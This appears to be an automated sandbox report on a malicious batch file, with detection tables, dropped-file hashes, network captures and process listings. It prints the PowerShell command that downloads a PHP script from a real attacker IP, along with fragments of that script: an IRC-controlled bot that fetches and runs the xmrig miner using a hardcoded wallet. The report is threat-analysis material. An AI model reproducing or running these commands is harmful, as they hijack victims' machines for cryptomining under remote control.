      Scripting
      11
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Process Discovery
      Remote ServicesData from Local System1
      Non-Application Layer Protocol
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      DLL Side-Loading
      21
      Virtualization/Sandbox Evasion
      LSASS Memory21
      Virtualization/Sandbox Evasion
      Remote Desktop ProtocolData from Removable Media11
      Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection
      Security Account Manager1
      Application Window Discovery
      SMB/Windows Admin SharesData from Network Shared Drive1
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading
      NTDS11
      System Information Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      ceR3axDjok.bat3%VirustotalBrowse
      ceR3axDjok.bat0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://45.138.16.193/xmrig100%Avira URL Cloudmalware
      https://api.moneroocean.stream/miner/$moneroOceanWallet/stats0%Avira URL Cloudsafe
      http://45.138.16.193/php-exe.php100%Avira URL Cloudmalware
      http://45.138.16.193/xmrig.exe0%Avira URL Cloudsafe
      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      http://45.138.16.193/php-exe.phptrue
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://api.moneroocean.stream/miner/$moneroOceanWallet/statsscript.php.2.drfalse
      • Avira URL Cloud: safe
      unknown
      http://45.138.16.193/xmrigscript.php.2.drtrue
      • Avira URL Cloud: malware
      unknown
      http://45.138.16.193/xmrig.exescript.php.2.drfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      45.138.16.193
      unknownNetherlands
      62068SPECTRAIPSpectraIPBVNLtrue
      Joe Sandbox version:42.0.0 Malachite
      Analysis ID:1587642
      Start date and time:2025-01-10 16:14:27 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 2m 2s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:3
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:ceR3axDjok.bat
      renamed because original name is a hash value
      Original Sample Name:8524f6f843902e2d19f29a578f76adf6.bat
      Detection:MAL
      Classification:mal68.mine.winBAT@4/4@0/1
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .bat
      • Stop behavior analysis, all processes terminated
      • Not all processes where analyzed, report is missing behavior information
      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      TimeTypeDescription
      10:15:30API Interceptor16x Sleep call for process: powershell.exe modified
      No context
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      SPECTRAIPSpectraIPBVNLfile.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
      • 45.141.26.134
      file.exeGet hashmaliciousXWormBrowse
      • 45.141.26.134
      file.exeGet hashmaliciousXWormBrowse
      • 45.141.26.134
      XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
      • 45.141.26.234
      Java32.exeGet hashmaliciousXWormBrowse
      • 45.141.26.234
      nklmips.elfGet hashmaliciousUnknownBrowse
      • 89.190.159.77
      1.elfGet hashmaliciousUnknownBrowse
      • 45.141.239.79
      TRC.ppc.elfGet hashmaliciousMiraiBrowse
      • 45.144.191.245
      da6ke5KbfB.exeGet hashmaliciousAsyncRAT, Babadeda, XWormBrowse
      • 45.141.26.234
      03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
      • 45.141.26.234
      No context
      No context
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):64
      Entropy (8bit):1.1940658735648508
      Encrypted:false
      SSDEEP:3:Nlllulbnolz:NllUc
      MD5:F23953D4A58E404FCB67ADD0C45EB27A
      SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
      SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
      SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:@...e................................................@..........
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Reputation:high, very likely benign file
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Reputation:high, very likely benign file
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:PHP script, Unicode text, UTF-8 text
      Category:dropped
      Size (bytes):17813
      Entropy (8bit):4.835540598133242
      Encrypted:false
      SSDEEP:384:kpp1zmOqfu1IZ/3J71Jrn89PWp9yNQPs7Ng1MmsfkZ:kr1zpqfSUvNIWp8NQPswZ
      MD5:D7667147B8D05DFB74E6FD751A59BEDF
      SHA1:72BE204A55A40804241FFEF4ABB9526A57E428BD
      SHA-256:D71AB4C2C2206C583172075D3BAA92696BF43A9455DF113E6161C7625CA8698B
      SHA-512:63BCF27B65B93D6CDC5C232F39130E76321A67ABFE17EA3BD6E2F808535A571712CA9A83EEDCB42A1BD0F7FCDD154C6AAA1E0FE50ED4A4241B8DB4F8B9F683D6
      Malicious:true
      Yara Hits:
      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\Desktop\script.php, Author: Joe Security
      Preview:<?php..// Configurazione del bot IRC.$server = '45.138.16.193'; // Sostituisci con l'indirizzo del server IRC.$port = 7575; // Porta del server IRC (di solito 6667 per connessioni non SSL).$channel = '#crypto'; // Canale a cui unirsi.$username = 'MyBot'; // Username del bot.$realname = 'MyBot IRC Bot'; // Realname del bot..// Configurazione MoneroOcean.$moneroOceanWallet = '42mAKKDHse31rjKojCBVznLTqUtmJE4V87ARaWtABC6SUgAs9oDk8BQjoiStvJpw7efVJKpYkURttFBpYLKeNkAm4A9HrBM'; // Sostituisci con il tuo indirizzo di portafoglio Monero.$moneroOceanApiUrl = "https://api.moneroocean.stream/miner/$moneroOceanWallet/stats"; // Endpoint per le statistiche globali..// Genera un identificatore univoco per il bot.function generateUniqueIdentifier() {. // Prova a ottenere il nome dell'utente (whoami). exec('whoami', $whoamiOutput, $whoamiStatus);. if ($whoamiStatus === 0 && !empty($whoamiOutput[0])) {. return $whoamiOutput[0]; // Usa il nome dell'utente come identificatore. }.. //
      File type:DOS batch file, ASCII text
      Entropy (8bit):4.968531646349193
      TrID:
        File name:ceR3axDjok.bat
        File size:525 bytes
        MD5:8524f6f843902e2d19f29a578f76adf6
        SHA1:23e89e62096675945ab5363a0d4a940573f2aa77
        SHA256:98415c21b45b1008b74b44cae8f3c27e803d2bb4a3899c79fb079c3cc833ac36
        SHA512:32e0ddf8a7b7e9935c79eb36d66a71e016e072ed4cb7a31db3222043e4360f7de431ae62c400df312a061fe844781dbf0054cea8d60202f2895b9825c6cfef18
        SSDEEP:12:DTiO85MNzO7bkyDDkT/08JGz5AyclxRMVRT/wxjAlV4T/pHRBtgyg57P:h86NmkyfkT/Cz5AFyT/wxy4T/pRjgygV
        TLSH:6DF0569B58C934160D56CE2084B8D4C3F6BB67C49B44B46C5E917D1CE00D6DF20DB85F
        File Content Preview:@echo off.REM Imposta il nome del file PHP e l'URL da cui scaricarlo.set "php_file=script.php".set "url=http://45.138.16.193/php-exe.php"..REM Scarica il file PHP.echo Scaricando %php_file%....powershell -Command "Invoke-WebRequest -Uri '%url%' -OutFile '
        Icon Hash:9686878b929a9886
        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
        2025-01-10T16:15:33.220488+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.44973245.138.16.19380TCP
        TimestampSource PortDest PortSource IPDest IP
        Jan 10, 2025 16:15:32.573901892 CET4973280192.168.2.445.138.16.193
        Jan 10, 2025 16:15:32.578937054 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:32.579045057 CET4973280192.168.2.445.138.16.193
        Jan 10, 2025 16:15:32.582293987 CET4973280192.168.2.445.138.16.193
        Jan 10, 2025 16:15:32.587249041 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.220212936 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.220288038 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.220324039 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.220362902 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.220396996 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.220431089 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.220463037 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.220488071 CET4973280192.168.2.445.138.16.193
        Jan 10, 2025 16:15:33.220489025 CET4973280192.168.2.445.138.16.193
        Jan 10, 2025 16:15:33.220489025 CET4973280192.168.2.445.138.16.193
        Jan 10, 2025 16:15:33.220499039 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.220532894 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.220570087 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.220577955 CET4973280192.168.2.445.138.16.193
        Jan 10, 2025 16:15:33.220623970 CET4973280192.168.2.445.138.16.193
        Jan 10, 2025 16:15:33.226663113 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.226697922 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.226733923 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.226774931 CET4973280192.168.2.445.138.16.193
        Jan 10, 2025 16:15:33.281841993 CET4973280192.168.2.445.138.16.193
        Jan 10, 2025 16:15:33.321990967 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.322015047 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.322035074 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.322133064 CET4973280192.168.2.445.138.16.193
        Jan 10, 2025 16:15:33.375648975 CET4973280192.168.2.445.138.16.193
        Jan 10, 2025 16:15:33.408793926 CET804973245.138.16.193192.168.2.4
        Jan 10, 2025 16:15:33.454157114 CET4973280192.168.2.445.138.16.193
        Jan 10, 2025 16:15:33.454158068 CET4973280192.168.2.445.138.16.193
        • 45.138.16.193
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.44973245.138.16.193806044C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 16:15:32.582293987 CET169OUTGET /php-exe.php HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: 45.138.16.193
        Connection: Keep-Alive
        Jan 10, 2025 16:15:33.220212936 CET1236INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 15:15:22 GMT
        Server: Apache/2.4.62 (Debian)
        Last-Modified: Wed, 08 Jan 2025 11:59:13 GMT
        ETag: "4595-62b309718d6e0"
        Accept-Ranges: bytes
        Content-Length: 17813
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Data Raw: 3c 3f 70 68 70 0a 0a 2f 2f 20 43 6f 6e 66 69 67 75 72 61 7a 69 6f 6e 65 20 64 65 6c 20 62 6f 74 20 49 52 43 0a 24 73 65 72 76 65 72 20 3d 20 27 34 35 2e 31 33 38 2e 31 36 2e 31 39 33 27 3b 20 2f 2f 20 53 6f 73 74 69 74 75 69 73 63 69 20 63 6f 6e 20 6c 27 69 6e 64 69 72 69 7a 7a 6f 20 64 65 6c 20 73 65 72 76 65 72 20 49 52 43 0a 24 70 6f 72 74 20 3d 20 37 35 37 35 3b 20 2f 2f 20 50 6f 72 74 61 20 64 65 6c 20 73 65 72 76 65 72 20 49 52 43 20 28 64 69 20 73 6f 6c 69 74 6f 20 36 36 36 37 20 70 65 72 20 63 6f 6e 6e 65 73 73 69 6f 6e 69 20 6e 6f 6e 20 53 53 4c 29 0a 24 63 68 61 6e 6e 65 6c 20 3d 20 27 23 63 72 79 70 74 6f 27 3b 20 2f 2f 20 43 61 6e 61 6c 65 20 61 20 63 75 69 20 75 6e 69 72 73 69 0a 24 75 73 65 72 6e 61 6d 65 20 3d 20 27 4d 79 42 6f 74 27 3b 20 2f 2f 20 55 73 65 72 6e 61 6d 65 20 64 65 6c 20 62 6f 74 0a 24 72 65 61 6c 6e 61 6d 65 20 3d 20 27 4d 79 42 6f 74 20 49 52 43 20 42 6f 74 27 3b 20 2f 2f 20 52 65 61 6c 6e 61 6d 65 20 64 65 6c 20 62 6f 74 0a 0a 2f 2f 20 43 6f 6e 66 69 67 75 72 61 7a [TRUNCATED]
        Data Ascii: <?php// Configurazione del bot IRC$server = '45.138.16.193'; // Sostituisci con l'indirizzo del server IRC$port = 7575; // Porta del server IRC (di solito 6667 per connessioni non SSL)$channel = '#crypto'; // Canale a cui unirsi$username = 'MyBot'; // Username del bot$realname = 'MyBot IRC Bot'; // Realname del bot// Configurazione MoneroOcean$moneroOceanWallet = '42mAKKDHse31rjKojCBVznLTqUtmJE4V87ARaWtABC6SUgAs9oDk8BQjoiStvJpw7efVJKpYkURttFBpYLKeNkAm4A9HrBM'; // Sostituisci con il tuo indirizzo di portafoglio Monero$moneroOceanApiUrl = "https://api.moneroocean.stream/miner/$moneroOceanWallet/stats"; // Endpoint per le statistiche globali// Genera un identificatore univoco per il botfunction generateUniqueIdentifier() { // Prova a ottenere il nome dell'utente (whoami) exec('whoami', $whoamiOutput, $whoamiStatus); if ($whoamiStatus === 0 && !empty($whoamiOutput[0])) { return $whoamiOutput[0]; // Usa il nome dell'utente come id
        Jan 10, 2025 16:15:33.220288038 CET1236INData Raw: 65 6e 74 69 66 69 63 61 74 6f 72 65 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2f 2f 20 53 65 20 77 68 6f 61 6d 69 20 6e 6f 6e 20 c3 a8 20 64 69 73 70 6f 6e 69 62 69 6c 65 2c 20 70 72 6f 76 61 20 61 20 6f 74 74 65 6e 65 72 65 20 69 6c 20 6e 6f 6d 65 20
        Data Ascii: entificatore } // Se whoami non disponibile, prova a ottenere il nome della macchina (hostname) $hostname = php_uname('n'); // Ottiene il nome della macchina if (!empty($hostname)) { return $hostname; // Usa il nome
        Jan 10, 2025 16:15:33.220324039 CET448INData Raw: 20 6d 65 73 73 61 67 67 69 0a 24 72 65 67 69 73 74 65 72 65 64 20 3d 20 66 61 6c 73 65 3b 20 2f 2f 20 46 6c 61 67 20 70 65 72 20 76 65 72 69 66 69 63 61 72 65 20 73 65 20 69 6c 20 62 6f 74 20 c3 a8 20 72 65 67 69 73 74 72 61 74 6f 0a 77 68 69 6c
        Data Ascii: messaggi$registered = false; // Flag per verificare se il bot registratowhile (!feof($socket)) { $data = fgets($socket, 4096); echo $data; // Mostra i dati ricevuti dal server IRC // Rispondere al PING del server per mantene
        Jan 10, 2025 16:15:33.220362902 CET1236INData Raw: 73 74 72 61 74 6f 20 28 6d 65 73 73 61 67 67 69 6f 20 30 30 31 29 0a 20 20 20 20 69 66 20 28 73 74 72 70 6f 73 28 24 64 61 74 61 2c 20 27 30 30 31 27 29 20 21 3d 3d 20 66 61 6c 73 65 29 20 7b 0a 20 20 20 20 20 20 20 20 24 72 65 67 69 73 74 65 72
        Data Ascii: strato (messaggio 001) if (strpos($data, '001') !== false) { $registered = true; // Unione al canale dopo la registrazione fwrite($socket, "JOIN $channel\r\n"); } // Gestire i messaggi nel canale solo dopo
        Jan 10, 2025 16:15:33.220396996 CET1236INData Raw: 6e 63 74 69 6f 6e 20 69 73 58 6d 72 69 67 52 75 6e 6e 69 6e 67 28 29 20 7b 0a 20 20 20 20 69 66 20 28 73 74 72 74 6f 75 70 70 65 72 28 73 75 62 73 74 72 28 50 48 50 5f 4f 53 2c 20 30 2c 20 33 29 29 20 3d 3d 3d 20 27 57 49 4e 27 29 20 7b 0a 20 20
        Data Ascii: nction isXmrigRunning() { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { // Windows: verifica se win.exe, xmrig.exe, .xmrig.exe o fart.exe sono in esecuzione exec('tasklist /FI "IMAGENAME eq win.exe"', $outputWin);
        Jan 10, 2025 16:15:33.220431089 CET1236INData Raw: 61 72 74 2e 65 78 65 27 5d 20 3a 20 5b 27 77 69 6e 27 2c 20 27 78 6d 72 69 67 27 2c 20 27 2e 78 6d 72 69 67 27 2c 20 27 66 61 72 74 27 5d 3b 0a 20 20 20 20 66 6f 72 65 61 63 68 20 28 24 66 69 6c 65 73 20 61 73 20 24 66 69 6c 65 29 20 7b 0a 20 20
        Data Ascii: art.exe'] : ['win', 'xmrig', '.xmrig', 'fart']; foreach ($files as $file) { if (file_exists($file)) { return true; // Se almeno uno dei file esiste } } return false; // Nessuno dei file esiste}// Funz
        Jan 10, 2025 16:15:33.220463037 CET1236INData Raw: 6e 74 73 28 24 6d 6f 6e 65 72 6f 4f 63 65 61 6e 41 70 69 55 72 6c 2c 20 66 61 6c 73 65 2c 20 24 63 6f 6e 74 65 78 74 29 3b 0a 20 20 20 20 69 66 20 28 24 72 65 73 70 6f 6e 73 65 20 3d 3d 3d 20 66 61 6c 73 65 29 20 7b 0a 20 20 20 20 20 20 20 20 24
        Data Ascii: nts($moneroOceanApiUrl, false, $context); if ($response === false) { $error = error_get_last(); return "Errore durante la richiesta HTTP: " . $error['message']; } // Decodifica la risposta JSON $data = json_dec
        Jan 10, 2025 16:15:33.220499039 CET896INData Raw: 20 73 74 61 74 6f 20 73 63 61 72 69 63 61 74 6f 20 63 6f 72 72 65 74 74 61 6d 65 6e 74 65 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 52 69 6e 6f 6d
        Data Ascii: stato scaricato correttamente."); return; } // Rinomina il file in win.exe if (!rename($localFile, $renamedFile)) { sendMessage($socket, $channel, "Errore: Impossibile rinominare il file in win
        Jan 10, 2025 16:15:33.220532894 CET1236INData Raw: 63 6b 65 74 2c 20 24 63 68 61 6e 6e 65 6c 2c 20 22 45 72 72 6f 72 65 3a 20 49 6d 70 6f 73 73 69 62 69 6c 65 20 61 76 76 69 61 72 65 20 77 69 6e 2e 65 78 65 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 20 65 6c 73 65 69 66 20 28 73
        Data Ascii: cket, $channel, "Errore: Impossibile avviare win.exe."); } } elseif (strpos($command, '!mininglinux') === 0) { // Comando mining per Linux $remoteFile = 'xmrig'; $localFile = 'xmrig'; // Scarica come xmrig
        Jan 10, 2025 16:15:33.220570087 CET1236INData Raw: 43 42 56 7a 6e 4c 54 71 55 74 6d 4a 45 34 56 38 37 41 52 61 57 74 41 42 43 36 53 55 67 41 73 39 6f 44 6b 38 42 51 6a 6f 69 53 74 76 4a 70 77 37 65 66 56 4a 4b 70 59 6b 55 52 74 74 46 42 70 59 4c 4b 65 4e 6b 41 6d 34 41 39 48 72 42 4d 20 2d 2d 70
        Data Ascii: CBVznLTqUtmJE4V87ARaWtABC6SUgAs9oDk8BQjoiStvJpw7efVJKpYkURttFBpYLKeNkAm4A9HrBM --pass crypto%RANDOM% --tls --cpu-priority-3 --asm=auto --cpu-no-yield -donate-level 0 --log-file=xmrig.log > /dev/null 2>&1 &'; exec($command); //
        Jan 10, 2025 16:15:33.226663113 CET1236INData Raw: 64 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 65 61 63 68 20 28 24 6f 75 74 70 75 74 20 61 73 20 24 6c 69 6e 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 73 5f 6e 75 6d 65 72
        Data Ascii: d) { foreach ($output as $line) { if (is_numeric($line) && $line != $currentPid) { exec("taskkill /F /PID $line"); } } } k


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:10:15:29
        Start date:10/01/2025
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" "
        Imagebase:0x7ff79ba30000
        File size:289'792 bytes
        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:1
        Start time:10:15:29
        Start date:10/01/2025
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff7699e0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:2
        Start time:10:15:29
        Start date:10/01/2025
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'"
        Imagebase:0x7ff788560000
        File size:452'608 bytes
        MD5 hash:04029E121A0CFA5991749937DD22A1D9
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        No disassembly